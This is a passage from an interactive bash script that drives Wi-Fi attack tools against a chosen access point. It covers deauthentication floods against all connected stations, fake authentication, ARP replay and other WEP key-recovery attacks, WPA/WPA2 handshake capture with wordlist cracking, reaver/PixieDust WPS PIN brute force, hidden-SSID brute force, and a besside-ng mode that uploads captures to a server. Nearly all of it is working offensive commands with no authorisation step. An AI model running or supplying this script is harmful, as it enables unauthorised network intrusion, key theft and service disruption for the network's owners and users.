$interfaceMonitor & #read pause #Working (uses session path) #$terminal airodump-ng -w "$capturePath/$encryptionType/dump_$essid" --bssid $bssid --channel $channel -i $interfaceMonitor & ;; "1") $terminal airodump-ng $interfaceMonitor --bssid $bssid --write "dump_$essid" #$terminal airodump-ng -w "dump_$essid" --bssid $bssid -i $interfaceMonitor & #$terminal airodump-ng --ignore-negative-one -w "dump_$essid" --bssid $bssid -i $interfaceMonitor & #read pause #Working (uses session path) #$terminal airodump-ng -w "$capturePath/$encryptionType/dump_$essid" --bssid $bssid -i $interfaceMonitor & ;; esac ;; "wpa" | "wpa2") doSleepMessage "Preparing to Capture WPA Handshake...." "3" disableChannelHopping case "$noChannel" in "0") $terminal airodump-ng $interfaceMonitor --bssid $bssid --channel $channel --write "dump_$essid" #$terminal airodump-ng -w "$capturePath/$encryptionType/dump_$essid" --bssid $bssid --channel $channel -i $interfaceMonitor & ;; "1") $terminal airodump-ng $interfaceMonitor --bssid $bssid --write "dump_$essid" #$terminal airodump-ng -w "dump_$essid" --bssid $bssid -i $interfaceMonitor & #Working (uses session path) #$terminal airodump-ng -w "$capturePath/$encryptionType/dump_$essid" --bssid $bssid -i $interfaceMonitor & ;; esac ;; esac echo "" echo "" } aircrackDecrypt(){ currentTask="aircrackDecrypt" sessionCopyNewCaptureFiles case "$encryptionType" in "wep") aircrackDecryptWEP ;; "wpa") aircrackDecryptWPA ;; "wpa2") aircrackDecryptWPA2 ;; esac } adAPScan(){ currentTask="adAPScan" echo "" banner rm "$defaultScanOutputIVS" rm "$defaultScanOutputXML" #$terminal airodump-ng --channel $channel -i $interfaceMonitor & #$terminal airodump-ng --ignore-negative-one --channel $channel -i $interfaceMonitor & $terminal airodump-ng --channel $channel --encrypt $encryptionType -i $interfaceMonitor -w "$initPath/apScan" --write-interval 10 -o netxml & #$terminal airodump-ng --channel $channel --encrypt $encryptionType -i $interfaceMonitor & #read pause echo "" echo "" } # Unused Function (20170103) adAPScanWPS(){ currentTask="adAPScanWPS" echo "" echo "" $terminal airodump-ng --channel $channel -i $interfaceMonitor --wps & #$terminal airodump-ng --channel $channel --encrypt $encryptionType -i $interfaceMonitor --$encryptionType& echo "" echo "" } adAPScanWifiteWPS(){ currentTask="adAPScanWifiteWPS" echo "" echo "" $terminal $wifiteAttackWPS -c $channel -i $interfaceMonitor & echo "" echo "" } adAPScanWifiteWEP(){ currentTask="adAPScanWifiteWEP" echo "" echo "" $terminal $wifiteAttackWEP -c $channel -i $interfaceMonitor & echo "" echo "" } adAPScanNoChannel(){ currentTask="adAPScanNoChannel" echo "" banner rm "$defaultScanOutputIVS" rm "$defaultScanOutputXML" #$terminal airodump-ng -i $interfaceMonitor & #$terminal airodump-ng --ignore-negative-one -i $interfaceMonitor & $terminal airodump-ng --encrypt $encryptionType -i $interfaceMonitor -w "$initPath/apScan" --write-interval 10 -o netxml & #$terminal airodump-ng --encrypt $encryptionType -i $interfaceMonitor & #read pause echo "" echo "" } adAPScanNoChannelWPS(){ currentTask="adAPScanNoChannelWPS" echo "" banner rm "$defaultScanOutputIVS" rm "$defaultScanOutputXML" $terminal airodump-ng -i $interfaceMonitor --wps -w "$initPath/apScan" --write-interval 10 -o netxml & #$terminal airodump-ng -i $interfaceMonitor --wps & #$terminal airodump-ng --encrypt $encryptionType -i $interfaceMonitor --$encryptionType& echo "" echo "" } adAPScanWifiteWPSNoChannel(){ currentTask="adAPScanWifiteWPSNoChannel" echo "" echo "" $terminal $wifiteAttackWPS -i $interfaceMonitor & echo "" echo "" } adAPScanWifiteWEPNoChannel(){ currentTask="adAPScanWifiteWEPNoChannel" echo "" echo "" $terminal $wifiteAttackWEP -i $interfaceMonitor & echo "" echo "" } bruteForceHiddenSSID(){ currentTask="bruteForceHiddenSSID" adAPScanNoChannel banner echo "" $green echo "Using Interface: $interfaceMonitor" echo "" echo "" echo "" echo "" $cyan echo "Use the airodump window to find your target" echo "" echo "Example Hidden: 01:02:03:04:05:06 " echo "" echo "" echo "" echo "" $white echo "Type Target BSSID and Press ENTER:" echo "" read targetBSSID case "$targetBSSID" in *) banner echo "" $cyan mdk3 $interfaceMonitor p -t $targetBSSID -b -s 300 echo "" echo "" ;; esac $green echo "" echo "" echo "" echo "***************************************" echo "Bruteforcing Finished!" echo "***************************************" echo "" echo "" echo "Check Above For Possible Hidden SSID Reveals" echo "" echo "" echo "" echo "" echo "Press ENTER To Continue When Finished...." echo "" read finishBrute } ############################################################################ # ATTACKS: GLOBAL END ################################################## ############################################################################ ############################################################################ # ATTACKS: WEP BEGIN ################################################### ############################################################################ autoModeNoPreviousSessionWEP(){ currentTask="autoModeNoPreviousSessionWEP" adAPScanNoChannel doSleepMessage "Setting Up User Input...." "2" getESSID getBSSID getChannel sessionWriteBeginNew sessionCopyNewCaptureFiles doSleepMessage "Killing airodump-ng Sessions...." "2" killAirodump killWifite doSleepMessage "Preparing Client Association...." "2" arAssociate #sleep 10 #killAireplay doSleepMessage "Preparing airodump-ng Session...." "2" adFileDump menuAttacksWEP } autoModeUsePreviousSessionWEP(){ currentTask="autoModeUsePreviousSessionWEP" sessionWriteLoadPrevious doSleepMessage "Preparing Client Association...." "2" arAssociate doSleepMessage "Preparing airodump-ng Session...." "2" adFileDump menuAttacksWEP } menuAttacksWEP(){ currentTask="menuAttacksWEP" lastMenuID="menuAttacksWEP" sessionCopyNewCaptureFiles banner bannerStats echo "" echo "Choose an attack to perform and press ENTER (Type \"more\" to see other options):" echo "" echo "" echo "1) De-Auth (De-Authenticate All Stations) (0=Constant)" echo "2) Fake Auth (Fake Authentication with AP)" echo "3) Interactive Attack (Interactive Frame Selection)" echo "4) ARP Replay (Standard ARP Request Replay)" echo "5) ChopChop Atack (Decrypt WEP Packets)" echo "6) Fragment Attack (Generates a Valid Keystream)" echo "7) Caffe-Latte Attack (Query Client for New IV's)" echo "8) C-Frag (Fragments Against a Client)" echo "9) MigMode (Attacks WPA Migration Mode)" echo "" echo "R) Re-Associate (Associate with Client)" echo "N) Start New Capture (Log to a new CAP file)" echo "T) Test (Tests Injection and Quality)" echo "" echo "C) Run Aircrack (Crack WEP Key) **If decryption fails, press ENTER from aircrack to return here**" echo "" read getAttackWEP hotkeyInput="$getAttackWEP" loadMenuHotkeys "$hotkeyInput" case "$getAttackWEP" in "") menuAttacksWEP ;; "C" | "c") aircrackDecrypt ;; "R" | "r") arAssociate ;; "T" | "t") arAttackTest ;; "N" | "n") killAirodump killAireplay adFileDump ;; "0") arAttackDeAuthConstant ;; "1") arAttackDeAuth ;; "2") arAttackFakeAuth ;; "3") arAttackInteractive ;; "4") arAttackArpReplay ;; "5") arAttackChopChop ;; "6") arAttackFragment ;; "7") arAttackCaffeLatte ;; "8") arAttackCfrag ;; "9") arAttackMigMode ;; "more") banner bannerStats echo "" echo "Choose an option and press ENTER:" echo "" echo "" echo "1) TCP Dump" echo "" echo "2) Generate ARP Packet" echo "" echo "3) Forge ARP Request" echo "" echo "4) Replay Forged ARP Request" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "R) Return To Previous Page" echo "" echo "" read getMore hotkeyInput="$getMore" loadMenuHotkeys "$hotkeyInput" case "$getMore" in "") menuAttacksWEP ;; "1") # Needs .cap as INPUT #tcpDump "" tcpDump "$initPath/$bssid-arp.cap" ;; "2") generateArpPacket ;; "3") # Needs .xor as INPUT #forgeArpRequest "" getXorFile=$(ls | grep xor | grep $essid) forgeArpRequest "$getXorFile" "$initPath/$bssid-arp.cap" ;; "4") # Needs .cap as INPUT (Using Default From forgeArpRequest) replayArpRequest ;; "R" | "r") menuAttacksWEP ;; esac ;; *) menuAttacksWEP ;; esac menuAttacksWEP } menuAttacksWEPWifiteAuto(){ currentTask="menuAttacksWEPWifiteAuto" lastMenuID="menuAttacksWEPWifiteAuto" killAll #$terminal $wifiteAttackWEP -c $channel -b $bssid -e $essid -wepsave -wepca 5000 & $terminal $wifiteAttackWEP -wepsave "$initPath" -wepca 5000 & banner bannerStats echo "" echo "The wifite session should be launched in a separate window." echo "" echo "PRESS ENTER ONLY WHEN THE SESSION HAS FINISHED!" echo "" echo "AS SOON AS ENTER IS PRESSED THE WIFITE SESSION WILL BE RESET!" echo "" read pause sessionCopyNewCaptureFiles killAll menuAuto } arAssociate(){ currentTask="arAssociate" echo "" echo "" $terminal aireplay-ng -1 6000 -e $essid -a $bssid -h $macAddressMonitor $interfaceMonitor & echo "" echo "" } arAttackDeAuth(){ currentTask="arAttackDeAuth" retryDeauth="0" doSleepMessage "Preparing to De-Authenticate All Connected Stations...." "2" $terminal aireplay-ng --deauth 5 -a $bssid $interfaceMonitor & doSleepMessage "De-Authenticating All Connected Stations...." "5" } arAttackDeAuthConstant(){ currentTask="arAttackDeAuthConstant" retryDeauth="0" doSleepMessage "De-Authenticating All Connected Stations...." "2" $terminal aireplay-ng --deauth 0 -a $bssid $interfaceMonitor & } arAttackFakeAuth(){ currentTask="arAttackFakeAuth" #$terminal aireplay-ng -1 1 -a $bssid -h $macAddressMonitor -e "$essid" $interfaceMonitor & $terminal aireplay-ng -1 0 -a $bssid -h $macAddressMonitor -e "$essid" $interfaceMonitor & # Alt #$terminal aireplay-ng -1 6000 -o 1 -q 10 -a $bssid -h $macAddressMonitor -e "$essid" $interfaceMonitor & } arAttackInteractive(){ currentTask="arAttackInteractive" $terminal aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -a $bssid -h $macAddressMonitor $interfaceMonitor & } arAttackArpReplay(){ currentTask="arAttackArpReplay" $terminal aireplay-ng -3 -e $essid -b $bssid -h $macAddressMonitor $interfaceMonitor & } arAttackChopChop(){ currentTask="arAttackChopChop" #$terminal aireplay-ng -4 -a $bssid -h $macAddressMonitor $interfaceMonitor & $terminal aireplay-ng -4 -h $macAddressMonitor -b $bssid $interfaceMonitor & # Unauthenticated Method #$terminal aireplay-ng -4 -b $bssid $interfaceMonitor & } arAttackFragment(){ currentTask="arAttackFragment" $terminal aireplay-ng -5 -e $essid -b $bssid -h $macAddressMonitor $interfaceMonitor & } arAttackCaffeLatte(){ currentTask="arAttackCaffeLatte" $terminal aireplay-ng -6 -e $essid -b $bssid -h $macAddressMonitor $interfaceMonitor & } arAttackCfrag(){ currentTask="arAttackCfrag" $terminal aireplay-ng -7 -e $essid -b $bssid -h $macAddressMonitor $interfaceMonitor & } arAttackMigMode(){ currentTask="arAttackMigMode" $terminal aireplay-ng -8 -e $essid -b $bssid -h $macAddressMonitor $interfaceMonitor & } arAttackTest(){ currentTask="arAttackTest" $terminal aireplay-ng -9 -e $essid -a $bssid -h $macAddressMonitor $interfaceMonitor & } aircrackDecryptWEP(){ currentTask="aircrackDecryptWEP" banner bannerStats echo "" echo "Preparing capture files for aircrack-ng...." echo "" echo "" findCaptureFiles #echo "$listCap" #echo "$listIvs" #read pause killAircrack aircrack-ng -a $acMode -e "$essid" -b $bssid -l "key_$essid" $listCap $listIvs& #aircrack-ng -e "$essid" -b $bssid -l "key_$essid" *.cap *.ivs& #aircrack-ng -l "key_$essid" *.cap *.ivs& #'aircrack-ng' " -l" "$capturePath/$encryptionType/key_$essid" "$capturePath/$encryptionType/*.cap" "$capturePath/$encryptionType/*.ivs"& # Killing aircrack-ng to stop auto-checking from overlapping WEP Attack menu killAircrack #echo "" #echo "" #echo "" #echo "FOUND KEY: " echo "" echo "" echo "" echo "Press ENTER to return to Attacks Menu...." echo "" echo "" read acPause menuAttacksWEP } ############################################################################ # ATTACKS: WEP END ##################################################### ############################################################################ ############################################################################ # ATTACKS: WPA BEGIN ################################################### ############################################################################ autoModeNoPreviousSessionWPA(){ currentTask="autoModeNoPreviousSessionWPA" adAPScanNoChannel doSleepMessage "Setting Up User Input...." "2" getESSID getBSSID getChannel sessionWriteBeginNew sessionCopyNewCaptureFiles doSleepMessage "Killing Airodump Window...." "2" killAirodump menuAttacksWPA echo "" echo "" echo "Press any key to continue...." echo "" echo "" read pause } autoModeUsePreviousSessionWPA(){ currentTask="autoModeUsePreviousSessionWPA" sessionWriteLoadPrevious menuAttacksWPA echo "" echo "" echo "Press any key to continue...." echo "" echo "" read pause } menuAttacksWPA(){ currentTask="menuAttacksWPA" banner bannerStats # Only run a deauth with default text and settings if not re-forced through menu case "$retryDeauth" in "0") killAll adFileDump doSleepMessage "Preparing to Capture WPA Handshake...." "2" arAttackDeAuth captureHandshakeWPA ;; "1") doSleepMessage "Preparing to De-Authenticate All Connected Stations...." "1" arAttackDeAuth captureHandshakeWPA ;; esac } aircrackDecryptWPA(){ currentTask="aircrackDecryptWPA" lastMenuID="aircrackDecryptWPA" banner bannerStats doSleepMessage "Preparing captured handshake for aircrack-ng...." "4" banner bannerStats echo "" echo "You need a wordlist to crack the key!" echo "" echo "Current List Loaded:" echo "" $green echo "$wordlist" $white echo "" echo "You may press C and ENTER to load a custom list" echo "" echo "" echo "Another Example Wordlist Collection:" echo "https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm" echo "" echo "" echo "You may also press B and ENTER to run a besside-ng attack" echo "" echo "" echo "Press ENTER once you have a valid wordlist ready!" echo "" echo "" read tmpPause hotkeyInput="$tmpPause" loadMenuHotkeys "$hotkeyInput" case "$tmpPause" in "") $terminal aircrack-ng -w "$wordlist" -b $bssid *.cap ;; "C" | "c") getCustomList ;; "B" | "b") bessideMain ;; esac banner bannerStats #echo "" #echo "" #echo "" #echo "FOUND KEY: " echo "" echo "WPA Attack Is Currently Running!" echo "" echo "" echo "" echo "" echo "" echo "" echo "" $red echo "*** WARNING! RESTARTING THE ATTACK WILL ALSO TERMINATE THE AIRCRACK WINDOW! ***" echo "" echo "" $white echo "Press ENTER to restart attack or use an option from Top Navigation Bar...." echo "" echo "" $red echo "*** WARNING! RESTARTING THE ATTACK WILL ALSO TERMINATE THE AIRCRACK WINDOW! ***" $white echo "" echo "" read acPause hotkeyInput="$acPause" loadMenuHotkeys "$hotkeyInput" case "$acPause" in "") killAll menuAttacksWPA ;; esac } captureHandshakeWPA(){ currentTask="captureHandshakeWPA" lastMenuID="captureHandshakeWPA" banner bannerStats echo "" echo "The airodump window is open. Look in top right hand corner for the handshake" echo "" echo "Once handshake is complete, you may close the airodump window." echo "" echo "" $green echo "Example: [ WPA handshake: $bssid ]" $white echo "" echo "" echo "" echo "To force another DEAUTH for HANDSHAKE press D and ENTER!" echo "" echo "" echo "" echo "" echo "Press ENTER to continue once handshake is made...." echo "" echo "" read captureHandshake hotkeyInput="$captureHandshake" loadMenuHotkeys "$hotkeyInput" case "$captureHandshake" in "") killAirodump killAireplay doSleepMessage "Preparing capture files for aircrack-ng...." "2" aircrackDecrypt ;; "D" | "d") retryDeauth="1" menuAttacksWPA ;; *) menuAttacksWPA ;; esac } menuAttacksWPAWifiteAuto(){ currentTask="menuAttacksWPAWifiteAuto" lastMenuID="menuAttacksWPAWifiteAuto" killAll #$terminal $wifiteAttackWEP -c $channel -b $bssid -e $essid -wepsave -wepca 1000 & $terminal $wifiteAttackWPA & banner bannerStats echo "" echo "The wifite session should be launched in a separate window." echo "" echo "" echo "" echo "" echo "PRESS ENTER ONLY WHEN THE SESSION HAS FINISHED!" echo "" echo "AS SOON AS ENTER IS PRESSED THE WIFITE SESSION WILL BE RESET!" echo "" read pause sessionCopyNewCaptureFiles killAll menuAuto } ############################################################################ # ATTACKS: WPA END ##################################################### ############################################################################ ############################################################################ # ATTACKS: WPA2 BEGIN ################################################## ############################################################################ autoModeNoPreviousSessionWPA2(){ currentTask="autoModeNoPreviousSessionWPA2" adAPScanNoChannel doSleepMessage "Setting Up User Input...." "2" getESSID getBSSID getChannel sessionWriteBeginNew sessionCopyNewCaptureFiles doSleepMessage "Killing Airodump Window...." "2" killAirodump menuAttacksWPA2 echo "" echo "" echo "Press any key to continue...." echo "" echo "" read pause } autoModeUsePreviousSessionWPA2(){ currentTask="autoModeUsePreviousSessionWPA2" sessionWriteLoadPrevious menuAttacksWPA2 echo "" echo "" echo "Press any key to continue...." echo "" echo "" read pause } menuAttacksWPA2(){ currentTask="menuAttacksWPA2" banner bannerStats # Only run a deauth with default text and settings if not re-forced through menu case "$retryDeauth" in "0") killAll adFileDump doSleepMessage "Preparing to Capture WPA Handshake...." "2" arAttackDeAuth captureHandshakeWPA2 ;; "1") doSleepMessage "Preparing to De-Authenticate All Connected Stations...." "1" arAttackDeAuth captureHandshakeWPA2 ;; esac } aircrackDecryptWPA2(){ currentTask="aircrackDecryptWPA2" lastMenuID="aircrackDecryptWPA2" banner bannerStats doSleepMessage "Preparing captured handshake for aircrack-ng...." "4" banner bannerStats echo "" echo "You need a wordlist to crack the key!" echo "" echo "Current List Loaded:" echo "" $green echo "$wordlist" $white echo "" echo "You may press C and ENTER to load a custom list" echo "" echo "" echo "Another Example Wordlist Collection:" echo "https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm" echo "" echo "" echo "You may also press B and ENTER to run a besside-ng attack" echo "" echo "" echo "Press ENTER once you have a valid wordlist ready!" echo "" echo "" read tmpPause hotkeyInput="$tmpPause" loadMenuHotkeys "$hotkeyInput" case "$tmpPause" in "") $terminal aircrack-ng -w "$wordlist" -b $bssid *.cap ;; "C" | "c") getCustomList ;; "B" | "b") bessideMain ;; esac banner bannerStats #echo "" #echo "" #echo "" #echo "FOUND KEY: " echo "" echo "WPA2 Attack Is Currently Running!" echo "" echo "" echo "" echo "" echo "" echo "" echo "" $red echo "*** WARNING! RESTARTING THE ATTACK WILL ALSO TERMINATE THE AIRCRACK WINDOW! ***" echo "" echo "" $white echo "Press ENTER to restart attack or use an option from Top Navigation Bar...." echo "" echo "" $red echo "*** WARNING! RESTARTING THE ATTACK WILL ALSO TERMINATE THE AIRCRACK WINDOW! ***" $white echo "" echo "" read acPause hotkeyInput="$acPause" loadMenuHotkeys "$hotkeyInput" case "$acPause" in "") killAll menuAttacksWPA2 ;; esac } captureHandshakeWPA2(){ currentTask="captureHandshakeWPA2" lastMenuID="captureHandshakeWPA2" banner bannerStats echo "" echo "The airodump window is open. Look in top right hand corner for the handshake" echo "" echo "Once handshake is complete, you may close the airodump window." echo "" echo "" $green echo "Example: [ WPA handshake: $bssid ]" $white echo "" echo "" echo "" echo "To force another DEAUTH for HANDSHAKE press D and ENTER!" echo "" echo "" echo "" echo "" echo "Press ENTER to continue once handshake is made...." echo "" echo "" read captureHandshake hotkeyInput="$captureHandshake" loadMenuHotkeys "$hotkeyInput" case "$captureHandshake" in "") killAirodump killAireplay doSleepMessage "Preparing capture files for aircrack-ng...." "2" aircrackDecrypt ;; *) menuAttacksWPA2 ;; esac } menuAttacksWPA2WifiteAuto(){ currentTask="menuAttacksWPA2WifiteAuto" lastMenuID="menuAttacksWPA2WifiteAuto" killAll #$terminal $wifiteAttackWEP -c $channel -b $bssid -e $essid -wepsave -wepca 1000 & $terminal $wifiteAttackWPA2 & banner bannerStats echo "" echo "The wifite session should be launched in a separate window." echo "" echo "" echo "" echo "" echo "PRESS ENTER ONLY WHEN THE SESSION HAS FINISHED!" echo "" echo "AS SOON AS ENTER IS PRESSED THE WIFITE SESSION WILL BE RESET!" echo "" read pause sessionCopyNewCaptureFiles killAll menuAuto } ############################################################################ # ATTACKS: WPA2 END #################################################### ############################################################################ ############################################################################ # ATTACKS: WPS BEGIN ################################################### ############################################################################ autoModeNoPreviousSessionWPS(){ currentTask="autoModeNoPreviousSessionWPS" #adAPScanWifiteWPSNoChannel #adAPScanNoChannel adAPScanNoChannelWPS doSleepMessage "Preparing Text List of Available Targets...." "15" doSleepMessage "Setting Up User Input...." "2" getESSID getBSSID getChannel sessionWriteBeginNew sessionCopyNewCaptureFiles doSleepMessage "Killing Airodump Window...." "2" killAirodump killWash killWifite getBSSIDCharOnly # Choose WPS Attack Method case "$attackMethodWPS" in "reaver") reaverSaveAllSessionFiles menuAttacksWPS ;; "bully") menuBullyMain ;; esac } autoModeUsePreviousSessionWPS(){ currentTask="autoModeUsePreviousSessionWPS" sessionWriteLoadPrevious menuAttacksWPS } menuAttacksWPS(){ currentTask="menuAttacksWPS" banner bannerStats # Set Default Choice pixieChoice="1" echo "" echo "1) Continue With PixieDust ENABLED (Recommended)" echo "" echo "2) Continue With PixieDust DISABLED" echo "" echo "" echo "" echo "" echo "" echo "" echo "Choose an Option and Press ENTER to continue" echo "" echo "" echo "" $green echo "If No Selection Is Made, It Will Continue Automatically Using PixieDust" $white echo "" echo "" echo "Continuing In 10 Seconds...." echo "" echo "" read -t 10 pixieChoice hotkeyInput="$pixieChoice" loadMenuHotkeys "$hotkeyInput" case "$pixieChoice" in "") #menuAttacksWPS pixieChoice="1" sleepMessage1="Preparing Reaver/PixieDust Session...." sleepMessage2="Launching Reaver/PixieDust Session...." sleepMessage3="Reaver Session Sprinkled With PixieDust Is Now Active!" ;; "1") pixieChoice="1" sleepMessage1="Preparing Reaver/PixieDust Session...." sleepMessage2="Launching Reaver/PixieDust Session...." sleepMessage3="Reaver Session Sprinkled With PixieDust Is Now Active!" ;; "2") pixieChoice="2" sleepMessage1="Preparing Reaver Session...." sleepMessage2="Launching Reaver Session...." sleepMessage3="Reaver Session Is Now Active!" ;; *) menuAttacksWPS ;; esac doSleepMessage "$sleepMessage1" "1" killAirodump killWash disableChannelHopping doSleepMessage "$sleepMessage1" "1" doSleepMessage "$sleepMessage2" "2" banner bannerStats doSleepMessage "$sleepMessage3" "0" "$green" $white echo "" echo "Press CTRL+C At Any Time To Stop Current Session and Save" sleep 2 case "$pixieChoice" in "1") #echo "PixeDust Enabled" #$reaver -i $interfaceMonitor -b $bssid -c $channel -S -vv -K $pixieNumber $reaver -i $interfaceMonitor -b $bssid -c $channel -vv -K $pixieNumber #read pause #pixieFailed="1" reaverSessionComplete case "$pixieFailed" in "1") banner bannerStats echo "Pixie Attack Failed! Starting Normal Reaver Attack" echo "" echo "" $white reaverMenuAttacksWPS ;; esac ;; "2") #echo "PixeDust Disabled" #$reaver -i $interfaceMonitor -b $bssid -c $channel -S -vv #$reaver -i $interfaceMonitor -b $bssid -c $channel -vv reaverMenuAttacksWPS ;; esac } reaverMenuAttacksWPS(){ currentTask="reaverMenuAttacksWPS" banner bannerStats sleepMessage1="Preparing Reaver Session...." sleepMessage2="Launching Reaver Session...." sleepMessage3="Reaver Session Is Now Active!" doSleepMessage "$sleepMessage1" "1" killAirodump killWash disableChannelHopping doSleepMessage "$sleepMessage1" "1" doSleepMessage "$sleepMessage2" "1" banner bannerStats doSleepMessage "$sleepMessage3" "0" "$green" $white echo "" echo "Press CTRL+C At Any Time To Stop Current Session and Save" sleep 2 $reaver -i $interfaceMonitor -b $bssid -c $channel -S -vv # Set pixieChoice To 0 For Triggering Normal Reaver Save Session Screen pixieChoice="0" reaverSessionComplete } reaverSessionComplete(){ currentTask="reaverSessionComplete" # Session has ended lands here getBSSIDCharOnly echo "" $lightBlue echo "***************************************" echo "** SCROLL UP FOR RECOVERED PASSWORD ***" echo "***************************************" echo "" #$magenta #echo "Attempting To Save Reaver Session...." #echo "" #echo "** Will Give Error If No Session Has Been Written **" #echo "" reaverSaveCurrentSessionFile $green echo "" echo "***************************************" echo "* Your reaver session has been saved! *" echo "***************************************" $white echo "" $yellow # Check if PixieDust was used case "$pixieChoice" in "0") echo "If the key is available, now would be a good time to do the following:" echo "" echo "- Write down or take a picture of the WPA/WPA2 key and/or WPS pin" echo "" echo "" $cyan echo "** YOU MAY NEED TO SCROLL UP TO SEE THE PASSPHRASE / PIN / ESSID **" $white echo "" echo "" echo "" echo "" echo "" echo "Press ENTER to continue...." echo "" read pause ;; "1") echo "If the key is available, now would be a good time to do the following:" echo "" echo "- Write down or take a picture of the WPA/WPA2 key and/or WPS pin" echo "" echo "" $cyan echo "** YOU MAY NEED TO SCROLL UP TO SEE THE PASSPHRASE / PIN / ESSID **" echo "" $cyan echo "* IF PIXIEDUST ATTACK FAILED, USE THE \"R\" OPTION TO START NORMAL REAVER ATTACK *" $white echo "" echo "" echo "" echo "Press ENTER to continue or type \"R\" to start normal Reaver attack...." echo "" read pixiePost case "$pixiePost" in "R" | "r") banner bannerStats echo "Pixie Attack Failed! Starting Normal Reaver Attack" echo "" echo "" $white reaverMenuAttacksWPS ;; esac ;; esac menuMain } menuAttacksWPSWifiteAuto(){ currentTask="menuAttacksWPSWifiteAuto" lastMenuID="menuAttacksWPSWifiteAuto" killAll #$terminal $wifiteAttackWPS -c $channel -b $bssid -e $essid -wepsave -wepca 1000 & $terminal $wifiteAttackWPS & banner bannerStats echo "" echo "The wifite session should be launched in a separate window." echo "" echo "PRESS ENTER ONLY WHEN THE SESSION HAS FINISHED!" echo "" echo "AS SOON AS ENTER IS PRESSED THE WIFITE SESSION WILL BE RESET!" echo "" read pause echo "" echo "" echo "Your wifite session has been saved!" echo "" echo "" echo "" echo "" echo "If the key is available, now would be a good time to do the following:" echo "" echo "1) Write down the WPA/WPA2 key and/or WPS pin" echo "" echo "2) Take a picture of the screen to keep a record of the keys" echo "" echo "" echo "" echo "" echo "Press ENTER to continue...." echo "" echo "" killAll menuAuto read pause } aircrackDecryptWPS(){ # NOT ACTUALLY USED FOR WPS ATTACK currentTask="aircrackDecryptWPS" blank="" } reaverSaveCurrentSessionFile(){ currentTask="reaverSaveCurrentSessionFile" # Use current session path and bssid to build variable reaverCurrentSessionFile="../../$reaverSessionPath/$bssidCharOnly.wpc" # Check BSSID and only continue if not blank if [ "$bssidCharOnly" != "" ];then # Check to see if reaver session file exists if [ -e $reaverCurrentSessionFile ];then # Copy reaver session file to current WPS sessions directory cp "$reaverCurrentSessionFile" "$capturePathWPS" fi fi } reaverSaveAllSessionFiles(){ currentTask="reaverSaveCurrentSessionFile" # Check BSSID and only continue if not blank if [ "$bssidCharOnly" != "" ];then cp "../../$reaverSessionPath/*.wpc" "$capturePathWPS" fi } menuBullyMain() { currentTask="menuBullyMain" banner echo "" echo "Bully WPS Attack Menu" echo "" echo "" echo "" echo "" echo "Choose an option and press ENTER:" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" read pause } menuWashMain() { #currentTask="menuWashMain" banner echo "" echo "WPS Wash Menu" echo "" echo "" echo "" echo "" echo "Choose an option and press ENTER:" echo "" echo "" echo "" echo "1) Use Defaults" echo "" echo "2) Enter Channel Number" echo "" echo "3) Toggle Scan Mode" echo "" echo "4) Use 5GHz Band" echo "" echo "5) Do Not Ignore Frame Checksum Errors" echo "" echo "" echo "" echo "" echo "R) Return To Previous Page" echo "" echo "" read washOption case "$washOption" in "1") wash -i $interfaceMonitor -o "$washFile" -C ;; "2") wash -i $interfaceMonitor -o "$washFile" -C -c $washChannel ;; "3") wash -i $interfaceMonitor -o "$washFile" -C -s ;; "4") wash -i $interfaceMonitor -o "$washFile" -C -5 ;; "5") wash -i $interfaceMonitor -o "$washFile" ;; "6") currentTask ;; esac } ############################################################################ # ATTACKS: WPS END ##################################################### ############################################################################ ############################################################################ # ATTACKS: UNIVERSAL BEGIN ############################################# ############################################################################ menuAttacksAllWifiteAuto(){ currentTask="menuAttacksAllWifiteAuto" lastMenuID="menuAttacksAllWifiteAuto" killAll $terminal $wifiteAttackAll & banner bannerStats echo "" echo "The wifite session should be launched in a separate window." echo "" echo "PRESS ENTER ONLY WHEN THE SESSION HAS FINISHED!" echo "" echo "AS SOON AS ENTER IS PRESSED THE WIFITE SESSION WILL BE RESET!" echo "" read pause killAll menuMain } generateArpPacket(){ currentTask="generateArpPacket" $terminal aireplay-ng -4 $interfaceMonitor & # Alt $terminal aireplay-ng -4 -h $macAddressMonitor $interfaceMonitor & } tcpDump(){ currentTask="tcpDump" # Accepts a CAP file as INPUT $terminal tcpdump -s 0 -n -e -r $1 & } forgeArpRequest(){ currentTask="forgeArpRequest" # Accepts an XOR file as INPUT #packetforge-ng -0 -a $bssid -h $macAddressMonitor -k 192.168.1.2 -l 192.168.1.100 -y $1 -w "$initPath/$bssid-arp.cap" & # Accepts an XOR file as INPUT and a CAP file as OUTPUT packetforge-ng -0 -a $bssid -h $macAddressMonitor -k 192.168.1.2 -l 192.168.1.100 -y $1 -w $2 & } replayArpRequest(){ currentTask="replayArpRequest" aireplay-ng -2 -r "$initPath/$bssid-arp.cap" $interfaceMonitor & # Accepts a CAP file as INPUT #aireplay-ng -2 -r $1 $interfaceMonitor & } ############################################################################ # ATTACKS: UNIVERSAL END ############################################### ############################################################################ ############################################################################ # BESSIDE-NG STUFF BEGIN ############################################### ############################################################################ bessideMain(){ currentTask="bessideMain" banner bannerStats echo "" echo "Select a mode and press ENTER:" echo "" echo "" echo "1) Normal" echo "" echo "2) WPA Only" echo "" echo "3) Upload" echo "" echo "4) Set Flood Rate" echo "" echo "5) Return To Previous Menu" echo "" echo "" read getBessideMode hotkeyInput="$getBessideMode" loadMenuHotkeys "$hotkeyInput" case "$getBessideMode" in "") bessideMain ;; "1") bessideNormal ;; "2") bessideWPAOnly ;; "3") bessideUpload ;; "4") bessideSetFloodRate ;; "5") $lastMenuID ;; *) bessideMain ;; esac } bessideNormal(){ currentTask="bessideNormal" $terminal besside-ng -b $bssid -c $channel -vv $interfaceMonitor } bessideUpload(){ currentTask="bessideUpload" $terminal besside-ng -b $bssid -c $channel -s $serverWPA -vv $interfaceMonitor } bessideWPAOnly(){ currentTask="bessideWPAOnly" $terminal besside-ng -b $bssid -c $channel -W -vv $interfaceMonitor } bessideSetFloodRate(){ currentTask="bessideSetFloodRate" bessideFloodRate="" } ############################################################################ # BESSIDE-NG STUFF END ################################################# ############################################################################ ############################################################################ # POST EXPLOITATION BEGIN ############################################## ############################################################################ ############################################################################ # POST EXPLOITATION END ################################################ ############################################################################ ############################################################################ # PROCESS MANAGEMENT BEGIN ############################################# ############################################################################ killProcesses(){ currentTask="killProcesses" killall NetworkManager killall 